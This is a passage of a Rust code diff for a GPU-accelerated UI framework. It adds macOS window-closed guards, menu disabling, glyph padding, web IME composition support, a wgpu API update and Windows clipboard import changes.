+ pasteboard.inner.setData_forType(data, ns_png_type);
+ }
+
+ let item = pasteboard.read().expect("should read PNG image");
+
+ // Test Image entry exists
+ assert_eq!(item.entries.len(), 1);
+ match &item.entries[0] {
+ ClipboardEntry::Image(img) => {
+ assert_eq!(img.format, ImageFormat::Png);
+ assert_eq!(img.bytes, png_bytes);
+ }
+ other => panic!("expected Image, got {:?}", other),
+ }
+ }
}
@@ -7,8 +7,8 @@ use block::ConcreteBlock;
use cocoa::{
appkit::{
NSApplication, NSApplicationActivationPolicy::NSApplicationActivationPolicyRegular,
- NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, NSSavePanel,
- NSVisualEffectState, NSVisualEffectView, NSWindow,
+ NSControl as _, NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel,
+ NSSavePanel, NSVisualEffectState, NSVisualEffectView, NSWindow,
},
base::{BOOL, NO, YES, id, nil, selector},
foundation::{
@@ -297,6 +297,7 @@ impl MacPlatform {
action,
os_action,
checked,
+ disabled,
} => {
// Note that this is intentionally using earlier bindings, whereas typically
// later ones take display precedence. See the discussion on
@@ -394,13 +395,18 @@ impl MacPlatform {
if *checked {
item.setState_(NSVisualEffectState::Active);
}
+ item.setEnabled_(if *disabled { NO } else { YES });
let tag = actions.len() as NSInteger;
let _: () = msg_send![item, setTag: tag];
actions.push(action.boxed_clone());
item
}
- MenuItem::Submenu(Menu { name, items }) => {
+ MenuItem::Submenu(Menu {
+ name,
+ items,
+ disabled,
+ }) => {
let item = NSMenuItem::new(nil).autorelease();
let submenu = NSMenu::new(nil).autorelease();
submenu.setDelegate_(delegate);
@@ -408,6 +414,7 @@ impl MacPlatform {
submenu.addItem_(Self::create_menu_item(item, delegate, actions, keymap));
}
item.setSubmenu_(submenu);
+ item.setEnabled_(if *disabled { NO } else { YES });
item.setTitle_(ns_string(name));
item
}
@@ -53,7 +53,8 @@ use crate::open_type::apply_features_and_fallbacks;
#[allow(non_upper_case_globals)]
const kCGImageAlphaOnly: u32 = 7;
-pub(crate) struct MacTextSystem(RwLock<MacTextSystemState>);
+/// macOS text system using CoreText for font shaping.
+pub struct MacTextSystem(RwLock<MacTextSystemState>);
#[derive(Clone, PartialEq, Eq, Hash)]
struct FontKey {
@@ -73,7 +74,8 @@ struct MacTextSystemState {
}
impl MacTextSystem {
- pub(crate) fn new() -> Self {
+ /// Create a new MacTextSystem.
+ pub fn new() -> Self {
Self(RwLock::new(MacTextSystemState {
memory_source: MemSource::empty(),
system_source: SystemSource::new(),
@@ -359,13 +361,22 @@ impl MacTextSystemState {
fn raster_bounds(&self, params: &RenderGlyphParams) -> Result<Bounds<DevicePixels>> {
let font = &self.fonts[params.font_id.0];
let scale = Transform2F::from_scale(params.scale_factor);
- Ok(bounds_from_rect_i(font.raster_bounds(
+ let mut bounds: Bounds<DevicePixels> = bounds_from_rect_i(font.raster_bounds(
params.glyph_id.0,
params.font_size.into(),
scale,
HintingOptions::None,
font_kit::canvas::RasterizationOptions::GrayscaleAa,
- )?))
+ )?);
+
+ // Add 3% of font size as padding, clamped between 1 and 5 pixels
+ // to avoid clipping of anti-aliased edges.
+ let pad =
+ ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5);
+ bounds.origin.x -= DevicePixels(pad);
+ bounds.size.width += DevicePixels(pad);
+
+ Ok(bounds)
}
fn rasterize_glyph(
@@ -55,7 +55,10 @@ use std::{
path::PathBuf,
ptr::{self, NonNull},
rc::Rc,
- sync::{Arc, Weak},
+ sync::{
+ Arc, Weak,
+ atomic::{AtomicBool, Ordering},
+ },
time::Duration,
};
use util::ResultExt;
@@ -172,6 +175,10 @@ unsafe fn build_classes() {
sel!(mouseExited:),
handle_view_event as extern "C" fn(&Object, Sel, id),
);
+ decl.add_method(
+ sel!(magnifyWithEvent:),
+ handle_view_event as extern "C" fn(&Object, Sel, id),
+ );
decl.add_method(
sel!(mouseDragged:),
handle_view_event as extern "C" fn(&Object, Sel, id),
@@ -436,6 +443,7 @@ struct MacWindowState {
select_previous_tab_callback: Option<Box<dyn FnMut()>>,
toggle_tab_bar_callback: Option<Box<dyn FnMut()>>,
activated_least_once: bool,
+ closed: Arc<AtomicBool>,
// The parent window if this window is a sheet (Dialog kind)
sheet_parent: Option<id>,
}
@@ -760,6 +768,7 @@ impl MacWindow {
select_previous_tab_callback: None,
toggle_tab_bar_callback: None,
activated_least_once: false,
+ closed: Arc::new(AtomicBool::new(false)),
sheet_parent: None,
})));
@@ -1016,6 +1025,17 @@ impl Drop for MacWindow {
}
}
+/// Calls `f` if the window is not closed.
+///
+/// This should be used when spawning foreground tasks interacting with the
+/// window, as some messages will end hard faulting if dispatched to no longer
+/// valid window handles.
+fn if_window_not_closed(closed: Arc<AtomicBool>, f: impl FnOnce()) {
+ if !closed.load(Ordering::Acquire) {
+ f();
+ }
+}
+
impl PlatformWindow for MacWindow {
fn bounds(&self) -> Bounds<Pixels> {
self.0.as_ref().lock().bounds()
@@ -1036,14 +1056,15 @@ impl PlatformWindow for MacWindow {
fn resize(&mut self, size: Size<Pixels>) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.setContentSize_(NSSize {
width: size.width.as_f32() as f64,
height: size.height.as_f32() as f64,
});
- }
+ })
})
.detach();
}
@@ -1256,15 +1277,21 @@ impl PlatformWindow for MacWindow {
}
});
let block = block.copy();
- let native_window = self.0.lock().native_window;
- let executor = self.0.lock().foreground_executor.clone();
+ let lock = self.0.lock();
+ let native_window = lock.native_window;
+ let closed = lock.closed.clone();
+ let executor = lock.foreground_executor.clone();
executor
.spawn(async move {
- let _: () = msg_send![
- alert,
- beginSheetModalForWindow: native_window
- completionHandler: block
- ];
+ if !closed.load(Ordering::Acquire) {
+ let _: () = msg_send![
+ alert,
+ beginSheetModalForWindow: native_window
+ completionHandler: block
+ ];
+ } else {
+ let _: () = msg_send![alert, release];
+ }
})
.detach();
@@ -1273,12 +1300,16 @@ impl PlatformWindow for MacWindow {
}
fn activate(&self) {
- let window = self.0.lock().native_window;
- let executor = self.0.lock().foreground_executor.clone();
+ let lock = self.0.lock();
+ let window = lock.native_window;
+ let closed = lock.closed.clone();
+ let executor = lock.foreground_executor.clone();
executor
.spawn(async move {
- unsafe {
- let _: () = msg_send![window, makeKeyAndOrderFront: nil];
+ if !closed.load(Ordering::Acquire) {
+ unsafe {
+ let _: () = msg_send![window, makeKeyAndOrderFront: nil];
+ }
}
})
.detach();
@@ -1416,11 +1447,12 @@ impl PlatformWindow for MacWindow {
fn zoom(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.zoom_(nil);
- }
+ })
})
.detach();
}
@@ -1428,11 +1460,12 @@ impl PlatformWindow for MacWindow {
fn toggle_fullscreen(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.toggleFullScreen_(nil);
- }
+ })
})
.detach();
}
@@ -1573,45 +1606,48 @@ impl PlatformWindow for MacWindow {
fn titlebar_double_click(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
- let defaults: id = NSUserDefaults::standardUserDefaults();
- let domain = ns_string("NSGlobalDomain");
- let key = ns_string("AppleActionOnDoubleClick");
-
- let dict: id = msg_send![defaults, persistentDomainForName: domain];
- let action: id = if !dict.is_null() {
- msg_send![dict, objectForKey: key]
- } else {
- nil
- };
+ if_window_not_closed(closed, || {
+ unsafe {
+ let defaults: id = NSUserDefaults::standardUserDefaults();
+ let domain = ns_string("NSGlobalDomain");
+ let key = ns_string("AppleActionOnDoubleClick");
+
+ let dict: id = msg_send![defaults, persistentDomainForName: domain];
+ let action: id = if !dict.is_null() {
+ msg_send![dict, objectForKey: key]
+ } else {
+ nil
+ };
- let action_str = if !action.is_null() {
- CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy()
- } else {
- "".into()
- };
+ let action_str = if !action.is_null() {
+ CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy()
+ } else {
+ "".into()
+ };
- match action_str.as_ref() {
- "None" => {
- // "Do Nothing" selected, so do no action
- }
- "Minimize" => {
- window.miniaturize_(nil);
- }
- "Maximize" => {
- window.zoom_(nil);
- }
- "Fill" => {
- // There is no documented API for "Fill" action, so we'll just zoom the window
- window.zoom_(nil);
- }
- _ => {
- window.zoom_(nil);
+ match action_str.as_ref() {
+ "None" => {
+ // "Do Nothing" selected, so do no action
+ }
+ "Minimize" => {
+ window.miniaturize_(nil);
+ }
+ "Maximize" => {
+ window.zoom_(nil);
+ }
+ "Fill" => {
+ // There is no documented API for "Fill" action, so we'll just zoom the window
+ window.zoom_(nil);
+ }
+ _ => {
+ window.zoom_(nil);
+ }
}
}
- }
+ })
})
.detach();
}
@@ -1795,10 +1831,13 @@ extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent:
// may need them even if there is no marked text;
// however we skip keys with control or the input handler adds control-characters to the buffer.
// and keys with function, as the input handler swallows them.
+ // and keys with platform (Cmd), so that Cmd+key events (e.g. Cmd+`) are not
+ // consumed by the IME on non-QWERTY / dead-key layouts.
if is_composing
|| (key_down_event.keystroke.key_char.is_none()
&& !key_down_event.keystroke.modifiers.control
- && !key_down_event.keystroke.modifiers.function)
+ && !key_down_event.keystroke.modifiers.function
+ && !key_down_event.keystroke.modifiers.platform)
{
{
let mut lock = window_state.as_ref().lock();
@@ -2063,11 +2102,13 @@ fn update_window_scale_factor(window_state: &Arc<Mutex<MacWindowState>>) {
let scale_factor = lock.scale_factor();
let size = lock.content_size();
let drawable_size = size.to_device_pixels(scale_factor);
- unsafe {
- let _: () = msg_send![
- lock.renderer.layer(),
- setContentsScale: scale_factor as f64
- ];
+ if let Some(layer) = lock.renderer.layer() {
+ unsafe {
+ let _: () = msg_send![
+ layer,
+ setContentsScale: scale_factor as f64
+ ];
+ }
}
lock.renderer.update_drawable_size(drawable_size);
@@ -2104,10 +2145,12 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id)
// in theory, we're not supposed to invoke this method manually but it balances out
// the spurious `becomeKeyWindow` event and helps us work around that bug.
if selector == sel!(windowDidBecomeKey:) && !is_active {
+ let native_window = lock.native_window;
+ drop(lock);
unsafe {
- let _: () = msg_send![lock.native_window, resignKeyWindow];
- return;
+ let _: () = msg_send![native_window, resignKeyWindow];
}
+ return;
}
let executor = lock.foreground_executor.clone();
@@ -2174,6 +2217,7 @@ extern "C" fn close_window(this: &Object, _: Sel) {
let close_callback = {
let window_state = get_window_state(this);
let mut lock = window_state.as_ref().lock();
+ lock.closed.store(true, Ordering::Release);
lock.close_callback.take()
};
@@ -28,6 +28,7 @@ gpui_macos.workspace = true
[target.'cfg(target_os = "windows")'.dependencies]
gpui_windows.workspace = true
+gpui = { workspace = true, features = ["windows-manifest"] }
[target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies]
gpui_linux.workspace = true
@@ -59,6 +59,22 @@ pub fn current_platform(headless: bool) -> Rc<dyn Platform> {
}
}
+/// Returns a new [`HeadlessRenderer`] for the current platform, if available.
+#[cfg(feature = "test-support")]
+pub fn current_headless_renderer() -> Option<Box<dyn gpui::PlatformHeadlessRenderer>> {
+ #[cfg(target_os = "macos")]
+ {
+ Some(Box::new(
+ gpui_macos::metal_renderer::MetalHeadlessRenderer::new(),
+ ))
+ }
+
+ #[cfg(not(target_os = "macos"))]
+ {
+ None
+ }
+}
+
#[cfg(all(test, target_os = "macos"))]
mod tests {
use super::*;
@@ -35,6 +35,7 @@ raw-window-handle = "0.6"
wasm_thread = { version = "0.3", features = ["es_modules"], optional = true }
web-sys = { version = "0.3", features = [
"console",
+ "CompositionEvent",
"CssStyleDeclaration",
"DataTransfer",
"Document",
@@ -1,10 +1,10 @@
use std::rc::Rc;
use gpui::{
- Capslock, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers,
- ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent,
- MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, ScrollWheelEvent,
- TouchPhase, point, px,
+ Capslock, DispatchEventResult, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent,
+ Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent,
+ MouseMoveEvent, MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta,
+ ScrollWheelEvent, TouchPhase, point, px,
};
use smallvec::smallvec;
use wasm_bindgen::prelude::*;
@@ -64,6 +64,9 @@ impl WebWindowInner {
self.register_dragleave(),
self.register_key_down(),
self.register_key_up(),
+ self.register_composition_start(),
+ self.register_composition_update(),
+ self.register_composition_end(),
self.register_focus(),
self.register_blur(),
self.register_pointer_enter(),
@@ -87,6 +90,18 @@ impl WebWindowInner {
closure
}
+ fn listen_input(
+ self: &Rc<Self>,
+ event_name: &str,
+ handler: impl FnMut(JsValue) + 'static,
+ ) -> Closure<dyn FnMut(JsValue)> {
+ let closure = Closure::<dyn FnMut(JsValue)>::new(handler);
+ self.input_element
+ .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref())
+ .ok();
+ closure
+ }
+
/// Registers a listener with `{passive: false}` so that `preventDefault()` works.
/// Needed for events like `wheel` which are passive by default in modern browsers.
fn listen_non_passive(
@@ -109,11 +124,9 @@ impl WebWindowInner {
closure
}
- fn dispatch_input(&self, input: PlatformInput) {
+ fn dispatch_input(&self, input: PlatformInput) -> Option<DispatchEventResult> {
let mut borrowed = self.callbacks.borrow_mut();
- if let Some(ref mut callback) = borrowed.input {
- callback(input);
- }
+ borrowed.input.as_mut().map(|callback| callback(input))
}
fn register_pointer_down(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
@@ -121,7 +134,7 @@ impl WebWindowInner {
self.listen("pointerdown", move |event: JsValue| {
let event: web_sys::PointerEvent = event.unchecked_into();
event.prevent_default();
- this.canvas.focus().ok();
+ this.input_element.focus().ok();
let button = dom_mouse_button_to_gpui(event.button());
let position = pointer_position_in_element(&event);
@@ -315,7 +328,7 @@ impl WebWindowInner {
fn register_key_down(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("keydown", move |event: JsValue| {
+ self.listen_input("keydown", move |event: JsValue| {
let event: web_sys::KeyboardEvent = event.unchecked_into();
let modifiers = modifiers_from_keyboard_event(&event, this.is_mac);
@@ -346,20 +359,38 @@ impl WebWindowInner {
let keystroke = Keystroke {
modifiers,
key,
- key_char,
+ key_char: key_char.clone(),
};
- this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent {
+ let result = this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent {
keystroke,
is_held,
prefer_character_input: false,
}));
+
+ if let Some(result) = result {
+ if !result.propagate {
+ return;
+ }
+ }
+
+ if this.is_composing.get() || event.is_composing() {
+ return;
+ }
+
+ if modifiers.is_subset_of(&Modifiers::shift()) {
+ if let Some(text) = key_char {
+ this.with_input_handler(|handler| {
+ handler.replace_text_in_range(None, &text);
+ });
+ }
+ }
})
}
fn register_key_up(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("keyup", move |event: JsValue| {
+ self.listen_input("keyup", move |event: JsValue| {
let event: web_sys::KeyboardEvent = event.unchecked_into();
let modifiers = modifiers_from_keyboard_event(&event, this.is_mac);
@@ -396,9 +427,42 @@ impl WebWindowInner {
})
}
+ fn register_composition_start(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionstart", move |_event: JsValue| {
+ this.is_composing.set(true);
+ })
+ }
+
+ fn register_composition_update(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionupdate", move |event: JsValue| {
+ let event: web_sys::CompositionEvent = event.unchecked_into();
+ let data = event.data().unwrap_or_default();
+ this.is_composing.set(true);
+ this.with_input_handler(|handler| {
+ handler.replace_and_mark_text_in_range(None, &data, None);
+ });
+ })
+ }
+
+ fn register_composition_end(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
+ let this = Rc::clone(self);
+ self.listen_input("compositionend", move |event: JsValue| {
+ let event: web_sys::CompositionEvent = event.unchecked_into();
+ let data = event.data().unwrap_or_default();
+ this.is_composing.set(false);
+ this.with_input_handler(|handler| {
+ handler.replace_text_in_range(None, &data);
+ handler.unmark_text();
+ });
+ this.input_element.set_value("");
+ })
+ }
+
fn register_focus(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("focus", move |_event: JsValue| {
+ self.listen_input("focus", move |_event: JsValue| {
{
let mut state = this.state.borrow_mut();
state.is_active = true;
@@ -412,7 +476,7 @@ impl WebWindowInner {
fn register_blur(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("blur", move |_event: JsValue| {
+ self.listen_input("blur", move |_event: JsValue| {
{
let mut state = this.state.borrow_mut();
state.is_active = false;
@@ -556,7 +620,10 @@ pub(crate) fn is_mac_platform(browser_window: &web_sys::Window) -> bool {
}
fn is_modifier_only_key(key: &str) -> bool {
- matches!(key, "control" | "alt" | "shift" | "platform" | "capslock")
+ matches!(
+ key,
+ "control" | "alt" | "shift" | "platform" | "capslock" | "compose" | "process"
+ )
}
fn compute_key_char(
@@ -45,6 +45,7 @@ pub(crate) struct WebWindowMutableState {
pub(crate) struct WebWindowInner {
pub(crate) browser_window: web_sys::Window,
pub(crate) canvas: web_sys::HtmlCanvasElement,
+ pub(crate) input_element: web_sys::HtmlInputElement,
pub(crate) has_device_pixel_support: bool,
pub(crate) is_mac: bool,
pub(crate) state: RefCell<WebWindowMutableState>,
@@ -53,6 +54,7 @@ pub(crate) struct WebWindowInner {
pub(crate) pressed_button: Cell<Option<MouseButton>>,
pub(crate) last_physical_size: Cell<(u32, u32)>,
pub(crate) notify_scale: Cell<bool>,
+ pub(crate) is_composing: Cell<bool>,
mql_handle: RefCell<Option<MqlHandle>>,
pending_physical_size: Cell<Option<(u32, u32)>>,
}
@@ -89,7 +91,7 @@ impl WebWindow {
let max_texture_dimension = context.device.limits().max_texture_dimension_2d;
let has_device_pixel_support = check_device_pixel_support();
- canvas.set_tab_index(0);
+ canvas.set_tab_index(-1);
let style = canvas.style();
style
@@ -114,7 +116,21 @@ impl WebWindow {
body.append_child(&canvas)
.map_err(|e| anyhow::anyhow!("Failed to append canvas to body: {e:?}"))?;
- canvas.focus().ok();
+ let input_element: web_sys::HtmlInputElement = document
+ .create_element("input")
+ .map_err(|e| anyhow::anyhow!("Failed to create input element: {e:?}"))?
+ .dyn_into()
+ .map_err(|e| anyhow::anyhow!("Created element is not an input: {e:?}"))?;
+ let input_style = input_element.style();
+ input_style.set_property("position", "fixed").ok();
+ input_style.set_property("top", "0").ok();
+ input_style.set_property("left", "0").ok();
+ input_style.set_property("width", "1px").ok();
+ input_style.set_property("height", "1px").ok();
+ input_style.set_property("opacity", "0").ok();
+ body.append_child(&input_element)
+ .map_err(|e| anyhow::anyhow!("Failed to append input to body: {e:?}"))?;
+ input_element.focus().ok();
let device_size = Size {
width: DevicePixels(0),
@@ -155,6 +171,7 @@ impl WebWindow {
let inner = Rc::new(WebWindowInner {
browser_window,
canvas,
+ input_element,
has_device_pixel_support,
is_mac,
state: RefCell::new(mutable_state),
@@ -163,6 +180,7 @@ impl WebWindow {
pressed_button: Cell::new(None),
last_physical_size: Cell::new((0, 0)),
notify_scale: Cell::new(false),
+ is_composing: Cell::new(false),
mql_handle: RefCell::new(None),
pending_physical_size: Cell::new(None),
});
@@ -389,6 +407,16 @@ impl WebWindowInner {
Some(closure)
}
+ pub(crate) fn with_input_handler<R>(
+ &self,
+ f: impl FnOnce(&mut PlatformInputHandler) -> R,
+ ) -> Option<R> {
+ let mut handler = self.state.borrow_mut().input_handler.take()?;
+ let result = f(&mut handler);
+ self.state.borrow_mut().input_handler = Some(handler);
+ Some(result)
+ }
+
pub(crate) fn register_appearance_change(
self: &Rc<Self>,
) -> Option<Closure<dyn FnMut(JsValue)>> {
@@ -78,11 +78,12 @@ impl WgpuContext {
#[cfg(target_family = "wasm")]
pub async fn new_web() -> anyhow::Result<Self> {
- let instance = wgpu::Instance::new(&wgpu::InstanceDescriptor {
+ let instance = wgpu::Instance::new(wgpu::InstanceDescriptor {
backends: wgpu::Backends::BROWSER_WEBGPU | wgpu::Backends::GL,
flags: wgpu::InstanceFlags::default(),
backend_options: wgpu::BackendOptions::default(),
memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(),
+ display: None,
});
let adapter = instance
@@ -148,12 +149,13 @@ impl WgpuContext {
}
#[cfg(not(target_family = "wasm"))]
- pub fn instance() -> wgpu::Instance {
- wgpu::Instance::new(&wgpu::InstanceDescriptor {
+ pub fn instance(display: Box<dyn wgpu::wgt::WgpuHasDisplayHandle>) -> wgpu::Instance {
+ wgpu::Instance::new(wgpu::InstanceDescriptor {
backends: wgpu::Backends::VULKAN | wgpu::Backends::GL,
flags: wgpu::InstanceFlags::default(),
backend_options: wgpu::BackendOptions::default(),
memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(),
+ display: Some(display),
})
}
@@ -198,9 +200,8 @@ impl WgpuContext {
//
// 1. ZED_DEVICE_ID match — explicit user override
// 2. Compositor GPU match — the GPU the display server is rendering on
- // 3. Device type — WGPU HighPerformance order (Discrete > Integrated >
- // Other > Virtual > Cpu). "Other" ranks above "Virtual" because
- // backends like OpenGL may report real hardware as "Other".
+ // 3. Device type (Discrete > Integrated > Other > Virtual > Cpu).
+ // "Other" ranks above "Virtual" because OpenGL seems to count as "Other".
// 4. Backend — prefer Vulkan/Metal/Dx12 over GL/etc.
adapters.sort_by_key(|adapter| {
let info = adapter.get_info();
@@ -305,10 +306,7 @@ impl WgpuContext {
anyhow::bail!("no compatible alpha modes");
}
- // Create the real device with full features
let (device, queue, dual_source_blending) = Self::create_device(adapter).await?;
-
- // Use an error scope to capture any validation errors during configure
let error_scope = device.push_error_scope(wgpu::ErrorFilter::Validation);
let test_config = wgpu::SurfaceConfiguration {
@@ -324,7 +322,6 @@ impl WgpuContext {
surface.configure(&device, &test_config);
- // Check if there was a validation error
let error = error_scope.pop().await;
if let Some(e) = error {
anyhow::bail!("surface configuration failed: {e}");
@@ -163,21 +163,22 @@ impl WgpuRenderer {
/// The caller must ensure that the window handle remains valid for the lifetime
/// of the returned renderer.
#[cfg(not(target_family = "wasm"))]
- pub fn new<W: HasWindowHandle + HasDisplayHandle>(
+ pub fn new<W>(
gpu_context: GpuContext,
window: &W,
config: WgpuSurfaceConfig,
compositor_gpu: Option<CompositorGpuHint>,
- ) -> anyhow::Result<Self> {
+ ) -> anyhow::Result<Self>
+ where
+ W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static,
+ {
let window_handle = window
.window_handle()
.map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?;
- let display_handle = window
- .display_handle()
- .map_err(|e| anyhow::anyhow!("Failed to get display handle: {e}"))?;
let target = wgpu::SurfaceTargetUnsafe::RawHandle {
- raw_display_handle: display_handle.as_raw(),
+ // Fall back to the display handle already provided via InstanceDescriptor::display.
+ raw_display_handle: None,
raw_window_handle: window_handle.as_raw(),
};
@@ -188,7 +189,7 @@ impl WgpuRenderer {
.borrow()
.as_ref()
.map(|ctx| ctx.instance.clone())
- .unwrap_or_else(WgpuContext::instance);
+ .unwrap_or_else(|| WgpuContext::instance(Box::new(window.clone())));
// Safety: The caller guarantees that the window handle is valid for the
// lifetime of this renderer. In practice, the RawWindow struct is created
@@ -645,7 +646,7 @@ impl WgpuRenderer {
module: &wgpu::ShaderModule| {
let pipeline_layout = device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some(&format!("{name}_layout")),
- bind_group_layouts: &[globals_layout, data_layout],
+ bind_group_layouts: &[Some(globals_layout), Some(data_layout)],
immediate_size: 0,
});
@@ -1052,10 +1053,19 @@ impl WgpuRenderer {
self.atlas.before_frame();
- let texture_result = self.resources().surface.get_current_texture();
- let frame = match texture_result {
- Ok(frame) => frame,
- Err(wgpu::SurfaceError::Lost | wgpu::SurfaceError::Outdated) => {
+ let frame = match self.resources().surface.get_current_texture() {
+ wgpu::CurrentSurfaceTexture::Success(frame) => frame,
+ wgpu::CurrentSurfaceTexture::Suboptimal(frame) => {
+ // Textures must be destroyed before the surface can be reconfigured.
+ drop(frame);
+ let surface_config = self.surface_config.clone();
+ let resources = self.resources_mut();
+ resources
+ .surface
+ .configure(&resources.device, &surface_config);
+ return;
+ }
+ wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => {
let surface_config = self.surface_config.clone();
let resources = self.resources_mut();
resources
@@ -1063,9 +1073,12 @@ impl WgpuRenderer {
.configure(&resources.device, &surface_config);
return;
}
- Err(e) => {
+ wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => {
+ return;
+ }
+ wgpu::CurrentSurfaceTexture::Validation => {
*self.last_error.lock().unwrap() =
- Some(format!("Failed to acquire surface texture: {e}"));
+ Some("Surface texture validation error".to_string());
return;
}
};
@@ -1609,7 +1622,9 @@ impl WgpuRenderer {
}
pub fn destroy(&mut self) {
- // wgpu resources are automatically cleaned up when dropped
+ // Release surface-bound GPU resources eagerly so the underlying native
+ // window can be destroyed before the renderer itself is dropped.
+ self.resources.take();
}
/// Returns true if the GPU device was lost and recovery is needed.
@@ -1625,11 +1640,10 @@ impl WgpuRenderer {
/// - The first window to call this will recreate the shared context
/// - Subsequent windows will adopt the already-recovered context
#[cfg(not(target_family = "wasm"))]
- pub fn recover(
- &mut self,
- raw_display_handle: raw_window_handle::RawDisplayHandle,
- raw_window_handle: raw_window_handle::RawWindowHandle,
- ) -> anyhow::Result<()> {
+ pub fn recover<W>(&mut self, window: &W) -> anyhow::Result<()>
+ where
+ W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static,
+ {
let gpu_context = self.context.as_ref().expect("recover requires gpu_context");
// Check if another window already recovered the context
@@ -1638,6 +1652,10 @@ impl WgpuRenderer {
.as_ref()
.is_none_or(|ctx| ctx.device_lost());
+ let window_handle = window
+ .window_handle()
+ .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?;
+
let surface = if needs_new_context {
log::warn!("GPU device lost, recreating context...");
@@ -1648,15 +1666,15 @@ impl WgpuRenderer {
// Wait for GPU driver to stabilize (350ms copied from windows :shrug:)
std::thread::sleep(std::time::Duration::from_millis(350));
- let instance = WgpuContext::instance();
- let surface = create_surface(&instance, raw_display_handle, raw_window_handle)?;
+ let instance = WgpuContext::instance(Box::new(window.clone()));
+ let surface = create_surface(&instance, window_handle.as_raw())?;
let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?;
*gpu_context.borrow_mut() = Some(new_context);
surface
} else {
let ctx_ref = gpu_context.borrow();
let instance = &ctx_ref.as_ref().unwrap().instance;
- create_surface(instance, raw_display_handle, raw_window_handle)?
+ create_surface(instance, window_handle.as_raw())?
};
let config = WgpuSurfaceConfig {
@@ -1691,13 +1709,13 @@ impl WgpuRenderer {
#[cfg(not(target_family = "wasm"))]
fn create_surface(
instance: &wgpu::Instance,
- raw_display_handle: raw_window_handle::RawDisplayHandle,
raw_window_handle: raw_window_handle::RawWindowHandle,
) -> anyhow::Result<wgpu::Surface<'static>> {
unsafe {
instance
.create_surface_unsafe(wgpu::SurfaceTargetUnsafe::RawHandle {
- raw_display_handle,
+ // Fall back to the display handle already provided via InstanceDescriptor::display.
+ raw_display_handle: None,
raw_window_handle,
})
.map_err(|e| anyhow::anyhow!("{e}"))
@@ -8,24 +8,22 @@ use windows::Win32::{
System::{
DataExchange::{
CloseClipboard, CountClipboardFormats, EmptyClipboard, EnumClipboardFormats,
- GetClipboardData, GetClipboardFormatNameW, IsClipboardFormatAvailable, OpenClipboard,
- RegisterClipboardFormatW, SetClipboardData,
+ GetClipboardData, GetClipboardFormatNameW, OpenClipboard, RegisterClipboardFormatW,
+ SetClipboardData,
},
Memory::{GMEM_MOVEABLE, GlobalAlloc, GlobalLock, GlobalSize, GlobalUnlock},
Ole::{CF_DIB, CF_HDROP, CF_UNICODETEXT},
},
UI::Shell::{DragQueryFileW, HDROP},
};
-use windows_core::PCWSTR;
+use windows::core::{Owned, PCWSTR};
use gpui::{
ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash,
};
-// https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-dragqueryfilew
const DRAGDROP_GET_FILES_COUNT: u32 = 0xFFFFFFFF;
-// Clipboard formats
static CLIPBOARD_HASH_FORMAT: LazyLock<u32> =
LazyLock::new(|| register_clipboard_format(windows::core::w!("GPUI internal text hash")));
static CLIPBOARD_METADATA_FORMAT: LazyLock<u32> =
@@ -39,47 +37,94 @@ static CLIPBOARD_PNG_FORMAT: LazyLock<u32> =
static CLIPBOARD_JPG_FORMAT: LazyLock<u32> =
LazyLock::new(|| register_clipboard_format(windows::core::w!("JFIF")));
-// Helper maps and sets
-static FORMATS_MAP: LazyLock<FxHashMap<u32, ClipboardFormatType>> = LazyLock::new(|| {
